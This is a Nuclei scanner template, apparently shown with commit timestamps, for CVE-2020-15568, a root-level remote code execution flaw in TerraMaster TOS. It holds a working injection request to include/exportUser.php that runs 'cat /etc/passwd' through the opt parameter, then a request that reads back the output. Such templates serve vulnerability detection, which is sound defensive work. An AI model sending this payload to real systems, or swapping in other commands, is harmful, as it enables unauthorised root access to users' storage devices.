2021-02-10 10:51:42 +00:00
id : CVE-2020-15568
info :
name : TerraMaster TOS v4.1.24 RCE
author : pikpikcu
severity : critical
2021-03-24 06:51:54 +00:00
description : TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
2021-02-10 10:51:42 +00:00
reference : https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
tags : cve,cve2020,terramaster,rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2020-15568
cwe-id : CWE-913
2021-02-10 10:51:42 +00:00
requests :
- raw :
- |
GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
- |
GET /include/nuclei.txt HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-02-10 10:51:42 +00:00
part : body
- type : status
status :
- 200